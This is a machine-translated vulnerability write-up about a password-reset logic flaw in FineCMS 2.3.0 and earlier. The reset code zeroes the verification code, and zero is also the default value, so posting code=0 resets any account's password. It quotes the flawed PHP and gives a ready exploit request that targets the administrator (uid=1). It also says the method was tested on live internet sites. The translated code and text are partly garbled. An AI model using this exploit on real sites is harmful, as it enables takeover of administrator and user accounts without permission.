Finecms & lt; = 2.3.0 any user password modification (Logical Analysis of code verification code)

Finecms <= 2.3.0 any user password modification (Logical Analysis of code verification code)

Affected version 2.3.0 and earlier versions updated from January 14, April 18. This problem does not exist in the latest version.

Wooyun blew a http://www.wooyun.org/bugs/wooyun-2014-060197 using brute-force cracking verification code to reset the password, the approach discussed here is cheaper than brute-force cracking.

Directly look at the logic of the code verification code: the logic analysis is being downloaded and commented.

Case 2:

$ Uid = (int) $ this-> input-> get ('uid'); $ code = (int) $ this-> input-> post ('code '); obtain the verification code from post. $ Data = $ this-> db-> where ('uid', $ uid)-> where ('randcode', $ code) query data from the database based on the verification code and uid. -> Select ('Salt, uid, username, email ')-> limit (1)-> get ('member')-> row_array (); if (! $ Data) {if the data corresponding to the Verification Code cannot be found, an error is prompted. $ This-> member_msg (lang ('m-000');} $ password1 = $ this-> input-> post ('password1 '); $ password2 = $ this-> input-> post ('password2 '); if ($ password1! = $ Password2) {$ error = lang ('m-019 ');} elseif (! $ Password1) {$ error = lang ('m-018');} else {// change the password $ this-> db-> where ('uid ', $ data ['uid'])-> update ('member', array (after the password is successfully modified, the randcode of the verification code is set to 0 !!!!! 'Randcode' => 0, 'Password' => md5 ($ password1 ). $ data ['salt']. md5 ($ password1); if ($ this-> get_cache ('member', 'setting', 'ucenter ')) {uc_user_edit ($ data ['username'], '', $ password1,'', 1) ;}$ this-> member_msg (lang ('m-052 '), dr_url ('login/Index'), 1) ;}break ;}}

The logic problem here is that after the password is changed, the verification code is set to zero. Go to the database and check that the default value of this field is 0. before determining whether the verification code is 0. As a result, 0 can be used as the verification code to directly modify the password of any account. This method has not been seen in the case of any password reset in the black box.

Use method, direct post url:

http://www.xxxxxxx.com/member/index.php?c=login&m=find&step=2&uid=1

Uid = 1 is the administrator. Post Data is code = 0 & password1 = 12345678 & password2 = 12345678
Test in Internet instances.